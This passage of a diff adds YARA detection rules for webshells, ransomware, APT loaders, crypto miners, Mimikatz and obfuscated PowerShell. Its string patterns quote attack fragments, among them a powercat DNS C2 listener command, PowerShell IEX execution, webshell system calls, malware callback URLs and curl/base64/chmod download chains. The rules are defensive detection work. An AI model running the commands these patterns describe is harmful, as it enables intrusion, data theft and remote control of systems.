+   strings:
+      $x1 = "powercat -l -p 8000 -r dns:10.1.1.1:53:c2.example.com" ascii fullword
+      $x2 = "try{[byte[]]$ReturnedData = $Encoding.GetBytes((IEX $CommandToExecute 2>&1 | Out-String))}" ascii fullword
+      $s1 = "Returning Encoded Payload..." ascii
+      $s2 = "$CommandToExecute =" ascii fullword
+      $s3 = "[alias(\"Execute\")][string]$e=\"\"," ascii
+   condition: 
+      uint16 ( 0 ) == 0x7566 and filesize < 200KB and 1 of ( $x* ) or 3 of them
+}
+
+rule WEBSHELL_PHP_DEWMODE_UNC2546_Feb21_1_RID3187 : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Detects DEWMODE webshells"
+      author = "Florian Roth"
+      reference = "https://www.fireeye.com/blog/threat-research/2021/02/accellion-fta-exploited-for-data-theft-and-extortion.html"
+      date = "2021-02-22 13:26:21"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "2e0df09fa37eabcae645302d9865913b818ee0993199a6d904728f3093ff48c7"
+      hash2 = "5fa2b9546770241da7305356d6427847598288290866837626f621d794692c1b"
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "<font size=4>Cleanup Shell</font></a>';" ascii fullword
+      $x2 = "$(sh /tmp/.scr)" 
+      $x3 = "@system('sudo /usr/local/bin/admin.pl --mount_cifs=" ascii
+      $s1 = "target=\\\"_blank\\\">Download</a></td>\";" ascii
+      $s2 = ",PASSWORD 1>/dev/null 2>/dev/null');" ascii
+      $s3 = ",base64_decode('" ascii
+      $s4 = "include \"remote.inc\";" ascii
+      $s5 = "@system('sudo /usr/local" ascii
+   condition: 
+      uint16 ( 0 ) == 0x3f3c and filesize < 9KB and ( 1 of ( $x* ) or 2 of them ) or 3 of them
+}
+
+rule SUSP_VEST_Encryption_Core_Accumulator_Jan21_RID3729 : DEMO EXE FILE G0032 MAL NK SUSP {
+   meta:
+      description = "Detects VEST encryption core accumulator in PE file as used by Lazarus malware"
+      author = "Florian Roth"
+      reference = "https://twitter.com/ochsenmeier/status/1354737155495649280"
+      date = "2021-01-28 17:26:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "7cd3ca8bdfb44e98a4b9d0c6ad77546e03d169bda9bdf3d1bcf339f68137af23"
+      tags = "DEMO, EXE, FILE, G0032, MAL, NK, SUSP"
+      minimum_yara = "1.7"
+      
+   strings:
+      $sc1 = { 4F 70 46 DA E1 8D F6 41 59 E8 5D 26 1E CC 2F 89
+               26 6D 52 BA BC 11 6B A9 C6 47 E4 9C 1E B6 65 A2
+               B6 CD 90 47 1C DF F8 10 4B D2 7C C4 72 25 C6 97
+               25 5D C6 1D 4B 36 BC 38 36 33 F8 89 B4 4C 65 A7
+               96 CA 1B 63 C3 4B 6A 63 DC 85 4C 57 EE 2A 05 C7
+               0C E7 39 35 8A C1 BF 13 D9 52 51 3D 2E 41 F5 72
+               85 23 FE A1 AA 53 61 3B 25 5F 62 B4 36 EE 2A 51
+               AF 18 8E 9A C6 CF C4 07 4A 9B 25 9B 76 62 0E 3E
+               96 3A A7 64 23 6B B6 19 BC 2D 40 D7 36 3E E2 85
+               9A D1 22 9F BC 30 15 9F C2 5D F1 23 E6 3A 73 C0 } 
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and 1 of them
+}
+
+rule PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20_RID33BA : DEMO EXE MAL {
+   meta:
+      description = "Detects XMRIG crypto coin miners"
+      author = "Florian Roth"
+      reference = "https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/"
+      date = "2020-12-31 15:00:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09"
+      tags = "DEMO, EXE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "xmrig.exe" fullword wide
+      $x2 = "xmrig.com" fullword wide
+      $x3 = "* for x86, CRYPTOGAMS" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 6000KB and 2 of them or all of them
+}
+
+rule SUSP_LNX_SH_CryptoMiner_Indicators_Dec20_1_RID364E : DEMO LINUX SCRIPT SUSP {
+   meta:
+      description = "Detects helper script used in a crypto miner campaign"
+      author = "Florian Roth"
+      reference = "https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/"
+      date = "2020-12-31 16:50:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "3298dbd985c341d57e3219e80839ec5028585d0b0a737c994363443f4439d7a5"
+      tags = "DEMO, LINUX, SCRIPT, SUSP"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "miner running" fullword ascii
+      $x2 = "miner runing" fullword ascii
+      $x3 = " --donate-level 1 " 
+      $x4 = " -o pool.minexmr.com:5555 " ascii
+   condition: 
+      filesize < 20KB and 1 of them
+}
+
+rule SUSP_AdobePDF_SFX_Bitmap_Combo_Executable_RID362C : ANOMALY DEMO EXE FILE SUSP {
+   meta:
+      description = "Detects a suspicious executable that contains both a SFX icon and an Adobe PDF icon"
+      author = "Florian Roth"
+      reference = "https://mp.weixin.qq.com/s/3Pa3hiuZyQBspDzH0kGSHw"
+      date = "2020-11-02 16:44:31"
+      score = 60
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "13655f536fac31e6c2eaa9e6e113ada2a0b5e2b50a93b6bbfc0aaadd670cde9b"
+      tags = "ANOMALY, DEMO, EXE, FILE, SUSP"
+      required_modules = "pe"
+      minimum_yara = "3.0.0"
+      
+   strings:
+      $sc1 = { FF 00 CC FF FF 00 99 FF FF 00 66 FF FF 00 33 FF
+               FF 80 00 FF FF 80 FF CC FF 80 CC CC FF C0 99 CC
+               FF 80 66 CC FF 00 33 CC FF 00 00 CC FF 00 FF 99
+               FF FF CC 99 FF FF 99 99 FF FF 66 99 FF FF 33 99
+               FF 08 00 99 FF 88 FF 66 FF 88 CC 66 FF 88 99 66
+               FF 88 66 66 FF 88 33 66 FF 05 00 66 FF 55 FF 33
+               FF 55 CC 33 FF 55 99 33 FF 55 66 33 FF 58 33 33
+               FF 01 00 33 FF 99 FF 00 FF 99 CC 00 FF 99 99 00
+               FF 99 66 00 FF 58 33 00 FF 01 00 00 FF 99 FF FF
+               CC 99 CC FF CC 99 99 FF CC 99 66 FF CC 58 33 FF
+               CC 01 00 FF CC FF FF CC CC FF CC CC CC FF 99 CC
+               CC FF 66 CC CC 58 33 CC CC 01 00 CC CC FF FF 99 } 
+      $sc2 = { 28 66 27 00 60 00 00 00 80 00 00 00 80 80 80 00
+               C0 C0 C0 00 FF FF FF 00 FF FF FF 00 FF FF FF 00
+               FF FF FF 00 FF FF FF 00 FF FF FF 00 FF FF FF 00
+               FF FF FF 00 FF FF FF 00 5D 33 00 00 5D 33 00 00
+               5D 33 00 00 5D 33 00 00 5D 33 00 00 5D 33 00 00
+               5D 33 00 00 5D 33 00 00 5D 33 00 00 5D 33 00 00 } 
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and all of them and pe.number_of_signatures < 1
+}
+
+rule SUSP_AdobePDF_Bitmap_Executable_RID328D : DEMO EXE FILE SUSP {
+   meta:
+      description = "Detects a suspicious executable that contains a Adobe PDF icon and no shows no sign of actual Adobe software"
+      author = "Florian Roth"
+      reference = "https://mp.weixin.qq.com/s/3Pa3hiuZyQBspDzH0kGSHw"
+      date = "2020-11-02 14:10:01"
+      score = 60
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "13655f536fac31e6c2eaa9e6e113ada2a0b5e2b50a93b6bbfc0aaadd670cde9b"
+      tags = "DEMO, EXE, FILE, SUSP"
+      required_modules = "pe"
+      minimum_yara = "3.0.0"
+      
+   strings:
+      $sc1 = { FF 00 CC FF FF 00 99 FF FF 00 66 FF FF 00 33 FF
+               FF 80 00 FF FF 80 FF CC FF 80 CC CC FF C0 99 CC
+               FF 80 66 CC FF 00 33 CC FF 00 00 CC FF 00 FF 99
+               FF FF CC 99 FF FF 99 99 FF FF 66 99 FF FF 33 99
+               FF 08 00 99 FF 88 FF 66 FF 88 CC 66 FF 88 99 66
+               FF 88 66 66 FF 88 33 66 FF 05 00 66 FF 55 FF 33
+               FF 55 CC 33 FF 55 99 33 FF 55 66 33 FF 58 33 33
+               FF 01 00 33 FF 99 FF 00 FF 99 CC 00 FF 99 99 00
+               FF 99 66 00 FF 58 33 00 FF 01 00 00 FF 99 FF FF
+               CC 99 CC FF CC 99 99 FF CC 99 66 FF CC 58 33 FF
+               CC 01 00 FF CC FF FF CC CC FF CC CC CC FF 99 CC
+               CC FF 66 CC CC 58 33 CC CC 01 00 CC CC FF FF 99 } 
+      $fp1 = "Adobe" ascii wide fullword
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and $sc1 and not 1 of ( $fp* ) and pe.number_of_signatures < 1
+}
+
+rule APT_CN_MAL_RedDelta_Shellcode_Loader_Oct20_2_RID36A3 : APT CHINA DEMO EXE G0129 MAL {
+   meta:
+      description = "Detects Red Delta samples"
+      author = "Florian Roth"
+      reference = "https://twitter.com/JAMESWT_MHT/status/1316387482708119556"
+      date = "2020-10-14 17:04:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "260ebbf392498d00d767a5c5ba695e1a124057c1c01fff2ae76db7853fe4255b"
+      hash2 = "9ccb4ed133be5c9c554027347ad8b722f0b4c3f14bfd947edfe75a015bf085e5"
+      hash3 = "b3fd750484fca838813e814db7d6491fea36abe889787fb7cf3fb29d9d9f5429"
+      tags = "APT, CHINA, DEMO, EXE, G0129, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "\\CLRLoader.exe" wide fullword
+      $x2 = "/callback.php?token=%s&computername=%s&username=%s" ascii fullword
+      $s1 = "DotNetLoader.Program" wide fullword
+      $s2 = "/download.php?api=40" ascii fullword
+      $s3 = "get %d URLDir" ascii fullword
+      $s4 = "Read code failed" ascii fullword
+      $s5 = "OpenFile fail!" wide fullword
+      $s6 = "Writefile success" wide fullword
+      $op1 = { 4c 8d 45 e0 49 8b cc 41 8d 51 c3 e8 34 77 02 00 } 
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 3000KB and 1 of ( $x* ) or 4 of them
+}
+
+rule APT_CN_MAL_RedDelta_Shellcode_Loader_Oct20_3_RID36A4 : APT CHINA DEMO EXE FILE G0129 MAL {
+   meta:
+      description = "Detects Red Delta samples"
+      author = "Florian Roth"
+      reference = "https://twitter.com/JAMESWT_MHT/status/1316387482708119556"
+      date = "2020-10-14 17:04:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      modified = "2022-12-21"
+      hash1 = "740992d40b84b10aa9640214a4a490e989ea7b869cea27dbbdef544bb33b1048"
+      tags = "APT, CHINA, DEMO, EXE, FILE, G0129, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "Taskschd.dll" ascii fullword
+      $s2 = "AddTaskPlanDllVerson.dll" ascii fullword
+      $s3 = "\\FlashUpdate.exe" ascii
+      $s4 = "D:\\Project\\FBIRedTeam" ascii fullword
+      $s5 = "Error %s:%d, ErrorCode: %x" ascii fullword
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 400KB and 4 of them
+}
+
+rule MAL_RANSOM_REvil_Oct20_1_RID2ED2 : CRIME DEMO EXE MAL RANSOM {
+   meta:
+      description = "Detects REvil ransomware"
+      author = "Florian Roth"
+      reference = "Internal Research"
+      date = "2020-10-13 11:30:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "5966c25dc1abcec9d8603b97919db57aac019e5358ee413957927d3c1790b7f4"
+      hash2 = "f66027faea8c9e0ff29a31641e186cbed7073b52b43933ba36d61e8f6bce1ab5"
+      hash3 = "f6857748c050655fb3c2192b52a3b0915f3f3708cd0a59bbf641d7dd722a804d"
+      tags = "CRIME, DEMO, EXE, MAL, RANSOM"
+      minimum_yara = "1.7"
+      
+   strings:
+      $op1 = { 0f 8c 74 ff ff ff 33 c0 5f 5e 5b 8b e5 5d c3 8b } 
+      $op2 = { 8d 85 68 ff ff ff 50 e8 2a fe ff ff 8d 85 68 ff } 
+      $op3 = { 89 4d f4 8b 4e 0c 33 4e 34 33 4e 5c 33 8e 84 } 
+      $op4 = { 8d 85 68 ff ff ff 50 e8 05 06 00 00 8d 85 68 ff } 
+      $op5 = { 8d 85 68 ff ff ff 56 57 ff 75 0c 50 e8 2f } 
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 400KB and 2 of them or 4 of them
+}
+
+rule APT_MAL_MalDoc_CloudAtlas_Oct20_1_RID3280 : APT DEMO FILE G0100 MAL {
+   meta:
+      description = "Detects unknown maldoc dropper noticed in October 2020"
+      author = "Florian Roth"
+      reference = "https://twitter.com/jfslowik/status/1316050637092651009"
+      date = "2020-10-13 14:07:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "7ba76b2311736dbcd4f2817c40dae78f223366f2404571cd16d6676c7a640d70"
+      tags = "APT, DEMO, FILE, G0100, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "https://msofficeupdate.org" wide
+   condition: 
+      uint16 ( 0 ) == 0xcfd0 and filesize < 300KB and 1 of ( $x* )
+}
+
+rule APT_MAL_URL_CloudAtlas_Oct20_2_RID3144 : APT DEMO FILE G0100 MAL {
+   meta:
+      description = "Detects unknown maldoc dropper noticed in October 2020"
+      author = "Florian Roth"
+      reference = "https://twitter.com/jfslowik/status/1316050637092651009"
+      date = "2020-10-13 13:15:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "a6a58b614a9f5ffa1d90b5d42e15521f52e2295f02c1c0e5cd9cbfe933303bee"
+      tags = "APT, DEMO, FILE, G0100, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $hc1 = { 5B 49 6E 74 65 72 6E 65 74 53 68 6F 72 74 63 75
+               74 5D 0D 0A 55 52 4C 3D 68 74 74 70 73 3A 2F 2F
+               6D 73 6F 66 66 69 63 65 75 70 64 61 74 65 2E 6F
+               72 67 } 
+   condition: 
+      uint16 ( 0 ) == 0x495b and filesize < 200 and $hc1 at 0
+}
+
+rule MAL_DOC_ZLoader_Oct20_1_RID2EA7 : DEMO FILE MAL {
+   meta:
+      description = "Detects weaponized ZLoader documents"
+      author = "Florian Roth"
+      reference = "https://twitter.com/JohnLaTwC/status/1314602421977452544"
+      date = "2020-10-10 11:23:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "668ca7ede54664360b0a44d5e19e76beb92c19659a8dec0e7085d05528df42b5"
+      hash2 = "a2ffabbb1b5a124f462a51fee41221081345ec084d768ffe1b1ef72d555eb0a0"
+      hash3 = "d268af19db475893a3d19f76be30bb063ab2ca188d1b5a70e51d260105b201da"
+      tags = "DEMO, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $sc1 = { 78 4E FC 04 AB 6B 17 E2 33 E3 49 62 50 69 BB 60
+               31 00 1E 00 02 4B BA E2 D8 E3 92 22 1E 69 96 20
+               98 } 
+      $sc2 = { 6B 9E E2 36 E3 69 62 72 69 3A 60 55 6E } 
+      $sc3 = { 3E 69 76 60 59 6E 34 FB 87 6B 75 } 
+   condition: 
+      uint16 ( 0 ) == 0xcfd0 and filesize < 40KB and filesize > 30KB and all of them
+}
+
+rule APT_MAL_NK_Lazarus_VHD_Ransomware_Oct20_1_RID359E : APT CRIME DEMO EXE FILE G0032 MAL NK RANSOM {
+   meta:
+      description = "Detects Lazarus VHD Ransomware"
+      author = "Florian Roth"
+      reference = "https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/"
+      date = "2020-10-05 16:20:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6"
+      hash2 = "5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473"
+      hash3 = "6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306"
+      tags = "APT, CRIME, DEMO, EXE, FILE, G0032, MAL, NK, RANSOM"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "HowToDecrypt.txt" wide fullword
+      $s2 = "rsa.cpp" wide fullword
+      $s3 = "sc stop \"Microsoft Exchange Compliance Service\"" ascii fullword
+      $op1 = { 8b 8d bc fc ff ff 8b 94 bd 34 03 00 00 33 c0 50 } 
+      $op2 = { 8b 8d 98 f9 ff ff 8d 64 24 00 8b 39 3b bc 85 34 } 
+      $op3 = { 8b 94 85 34 03 00 00 89 11 40 83 c1 04 3b 06 7c } 
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 400KB and 2 of them
+}
+
+rule APT_MAL_NK_Lazarus_VHD_Ransomware_Oct20_2_RID359F : APT CRIME DEMO EXE FILE G0032 MAL NK RANSOM {
+   meta:
+      description = "Detects Lazarus VHD Ransomware"
+      author = "Florian Roth"
+      reference = "https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/"
+      date = "2020-10-05 16:21:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "097ca829e051a4877bca093cee340180ff5f13a9c266ad4141b0be82aae1a39b"
+      hash2 = "73a10be31832c9f1cbbd798590411009da0881592a90feb472e80025dfb0ea79"
+      tags = "APT, CRIME, DEMO, EXE, FILE, G0032, MAL, NK, RANSOM"
+      minimum_yara = "1.7"
+      
+   strings:
+      $op1 = { f9 36 88 08 8d ad fc ff ff ff 66 ff c1 e9 72 86 } 
+      $op2 = { c6 c4 58 0f a4 c8 12 8d ad ff ff ff ff 0f b6 44 } 
+      $op3 = { 88 02 66 c1 f0 54 8d bf fc ff ff ff 0f ba e0 19 } 
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 9000KB and all of them
+}
+
+rule APT_MAL_SLOTHFULMEDIA_Oct20_1_RID2FD6 : APT DEMO EXE MAL {
+   meta:
+      description = "Detects SLOTHFULMEDIA malware"
+      author = "Florian Roth"
+      reference = "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-275a"
+      date = "2020-10-01 12:14:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "64d78eec46c9ddd4b9a366de62ba0f2813267dc4393bc79e4c9a51a9bb7e6273"
+      hash2 = "927d945476191a3523884f4c0784fb71c16b7738bd7f2abd1e3a198af403f0ae"
+      hash3 = "f0503f0131040b805e106eafe64a65d9404a0e279f052237b868e456c34d36e6"
+      tags = "APT, DEMO, EXE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $xc1 = { 25 73 26 69 3D 25 64 00 48 54 54 50 2F 31 2E 31
+               00 00 00 00 50 4F 53 54 00 00 00 00 43 6F 6E 74
+               65 6E 74 2D 4C 65 6E 67 74 68 3A 20 25 64 00 00
+               5C 00 53 00 65 00 74 00 75 00 70 00 55 00 69 00
+               00 00 00 00 25 00 73 00 25 00 73 00 5F 00 25 00
+               64 00 2E 00 64 00 61 00 74 } 
+      $xc2 = { 2F 76 3F 6D 3D 00 00 00 35 30 31 00 32 30 30 00
+               2A 00 2E 00 2A 00 00 00 25 00 73 00 00 00 00 00
+               53 00 65 00 44 00 65 00 62 00 75 00 67 00 50 00
+               72 00 69 00 76 00 69 00 6C 00 65 00 67 00 65 } 
+      $xc3 = { 00 25 00 73 00 7C 00 25 00 73 00 7C 00 25 00 73
+               00 7C 00 25 00 73 00 00 00 5C 00 46 00 69 00 6C
+               00 74 00 65 00 72 00 33 00 2E 00 6A 00 70 00 67 } 
+      $sc1 = { 25 74 65 6D 70 25 00 00 25 73 5C 25 73 2E 65 78
+               65 00 00 00 25 74 65 6D 70 25 00 00 25 73 5C 25
+               73 2E 65 78 65 } 
+      $sc2 = { 61 70 70 6C 69 63 61 74 69 6F 6E 2F 6F 63 74 65
+               74 2D 73 74 72 65 61 6D 2C 61 70 70 6C 69 63 61
+               74 69 6F 6E 2F 78 68 74 6D 6C 00 00 25 73 26 69
+               3D 25 64 00 48 54 54 50 2F 31 2E 31 00 00 00 00
+               50 4F 53 54 } 
+      $s1 = "%s%s_%d.dat" wide fullword
+      $s2 = "Local Security Process" wide fullword
+      $s3 = "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.75" ascii fullword
+      $s4 = "Global%s%d" wide fullword
+      $s5 = "ExtKeyloggerStart" ascii fullword
+      $s6 = "GetExtendedTcpTable" ascii fullword
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 400KB and ( 1 of ( $x* ) or 3 of them ) or 4 of them
+}
+
+rule SUSP_ZIP_NtdsDIT_RID2C87 : DEMO FILE SUSP T1003_003 T1020 {
+   meta:
+      description = "Detects ntds.dit files in ZIP archives that could be a left over of administrative activity or traces of data exfiltration"
+      author = "Florian Roth"
+      reference = "https://pentestlab.blog/2018/07/04/dumping-domain-password-hashes/"
+      date = "2020-08-10 09:53:01"
+      score = 50
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, FILE, SUSP, T1003_003, T1020"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "ntds.dit" ascii
+   condition: 
+      uint16 ( 0 ) == 0x4b50 and $s1 in ( 0 .. 256 )
+}
+
+rule HKTL_Mimikatz_SkeletonKey_in_memory_Aug20_1_RID3752 : DEMO HKTL S0002 T1003 T1075 T1097 T1098 T1177 T1178 {
+   meta:
+      description = "Detects Mimikatz SkeletonKey in Memory"
+      author = "Florian Roth"
+      reference = "https://twitter.com/sbousseaden/status/1292143504131600384?s=12"
+      date = "2020-08-09 17:33:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, HKTL, S0002, T1003, T1075, T1097, T1098, T1177, T1178"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = { 60 ba 4f ca c7 44 24 34 dc 46 6c 7a c7 44 24 38
+              03 3c 17 81 c7 44 24 3c 94 c0 3d f6 } 
+   condition: 
+      1 of them
+}
+
+rule SUSP_LNX_Linux_Malware_Indicators_Aug20_1_RID3621 : DEMO LINUX MAL SUSP T1033 {
+   meta:
+      description = "Detects indicators often found in linux malware samples"
+      author = "Florian Roth"
+      reference = "Internal Research"
+      date = "2020-08-03 16:42:41"
+      score = 65
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, LINUX, MAL, SUSP, T1033"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "&& chmod +x" ascii
+      $s2 = "|base64 -" ascii
+      $s3 = " /tmp" ascii
+      $s4 = "|curl " ascii
+      $s5 = "whoami" ascii fullword
+      $fp1 = "WITHOUT ANY WARRANTY" ascii
+      $fp2 = "postinst" ascii fullword
+      $fp3 = "THIS SOFTWARE IS PROVIDED" ascii fullword
+      $fp4 = "Free Software Foundation" ascii fullword
+   condition: 
+      filesize < 400KB and 3 of ( $s* ) and not 1 of ( $fp* )
+}
+
+rule SUSP_RANSOMWARE_Indicator_Jul20_RID31A2 : CRIME DEMO EXE FILE RANSOM SUSP {
+   meta:
+      description = "Detects ransomware indicator"
+      author = "Florian Roth"
+      reference = "https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/"
+      date = "2020-07-28 13:30:51"
+      score = 60
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6"
+      hash2 = "5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473"
+      hash3 = "6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306"
+      tags = "CRIME, DEMO, EXE, FILE, RANSOM, SUSP"
+      minimum_yara = "1.7"
+      
+   strings:
+      $ = "Decrypt.txt" ascii wide
+      $ = "DecryptFiles.txt" ascii wide
+      $ = "Decrypt-Files.txt" ascii wide
+      $ = "DecryptFilesHere.txt" ascii wide
+      $ = "DECRYPT.txt" ascii wide
+      $ = "DecryptFiles.txt" ascii wide
+      $ = "DECRYPT-FILES.txt" ascii wide
+      $ = "DecryptFilesHere.txt" ascii wide
+      $ = "DECRYPT_INSTRUCTION.TXT" ascii wide
+      $ = "FILES ENCRYPTED.txt" ascii wide
+      $ = "DECRYPT MY FILES" ascii wide
+      $ = "DECRYPT-MY-FILES" ascii wide
+      $ = "DECRYPT_MY_FILES" ascii wide
+      $ = "DECRYPT YOUR FILES" ascii wide
+      $ = "DECRYPT-YOUR-FILES" ascii wide
+      $ = "DECRYPT_YOUR_FILES" ascii wide
+      $ = "DECRYPT FILES.txt" ascii wide
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 1400KB and 1 of them
+}
+
+rule SUSP_RAR_Single_Doc_File_RID2FB5 : DEMO FILE SUSP {
+   meta:
+      description = "Detects suspicious RAR files that contain nothing but a single .doc file"
+      author = "Florian Roth"
+      reference = "Internal Research"
+      date = "2020-07-11 12:08:41"
+      score = 40
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "51a568ac3ceb6bc4a4a123af9ca383a32bac0f630b17a1cc99e45ff8002727b1"
+      hash2 = "f9eddbebf9c41089d7507291adbaac8a4bcebffcd960f838d8a9648194d38a4a"
+      tags = "DEMO, FILE, SUSP"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = ".doc" 
+   condition: 
+      uint16 ( 0 ) == 0x6152 and filesize < 4000KB and $s1 at ( uint16 ( 5 ) + uint16 ( uint16 ( 5 ) + 5 ) + uint16 ( uint16 ( 5 ) + uint16 ( uint16 ( 5 ) + 5 ) + 5 ) - 9 ) and ( uint16 ( 5 ) + uint16 ( uint16 ( 5 ) + 5 ) + uint16 ( uint16 ( 5 ) + uint16 ( uint16 ( 5 ) + 5 ) + 5 ) + uint32 ( uint16 ( 5 ) + uint16 ( uint16 ( 5 ) + 5 ) + 7 ) > filesize - 8 )
+}
+
+rule SUSP_GIF_Anomalies_RID2D89 : DEMO FILE OBFUS SUSP {
+   meta:
+      description = "Detects files with GIF headers and format anomalies - which means that this image could be an obfuscated file of a different type"
+      author = "Florian Roth"
+      reference = "https://en.wikipedia.org/wiki/GIF"
+      date = "2020-07-02 10:36:01"
+      score = 50
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, FILE, OBFUS, SUSP"
+      minimum_yara = "1.7"
+      
+   condition: 
+      uint16 ( 0 ) == 0x4947 and uint8 ( 2 ) == 0x46 and uint8 ( 11 ) != 0x00 and uint8 ( 12 ) != 0x00 and uint8 ( filesize - 1 ) != 0x3b
+}
+
+rule SUSP_OBFUSC_PowerShell_True_Jun20_1_RID335E : DEMO OBFUS SCRIPT SUSP T1027 T1059_001 T1086 {
+   meta:
+      description = "Detects indicators often found in obfuscated PowerShell scripts"
+      author = "Florian Roth"
+      reference = "https://github.com/corneacristian/mimikatz-bypass/"
+      date = "2020-06-27 14:44:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, OBFUS, SCRIPT, SUSP, T1027, T1059_001, T1086"
+      minimum_yara = "1.7"
+      
+   strings:
+      $ = "${t`rue}" ascii nocase
+      $ = "${tr`ue}" ascii nocase
+      $ = "${tru`e}" ascii nocase
+      $ = "${t`ru`e}" ascii nocase
+      $ = "${tr`u`e}" ascii nocase
+      $ = "${t`r`ue}" ascii nocase
+      $ = "${t`r`u`e}" ascii nocase
+   condition: 
+      filesize < 6000KB and 1 of them
+}
+
+rule APT_MAL_Ke3chang_Ketrican_Jun20_1_RID3280 : APT DEMO EXE G0004 MAL {
+   meta:
+      description = "Detects Ketrican malware"
+      author = "Florian Roth"
+      reference = "BfV Cyber-Brief Nr. 01/2020"
+      date = "2020-06-18 14:07:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "02ea0bc17875ab403c05b50205389065283c59e01de55e68cee4cf340ecea046"
+      hash2 = "f3efa600b2fa1c3c85f904a300fec56104d2caaabbb39a50a28f60e0fdb1df39"
+      tags = "APT, DEMO, EXE, G0004, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $xc1 = { 00 59 89 85 D4 FB FF FF 8B 85 D4 FB FF FF 89 45
+               FC 68 E0 58 40 00 8F 45 FC E9 } 
+      $op1 = { 6a 53 58 66 89 85 24 ff ff ff 6a 79 58 66 89 85 } 
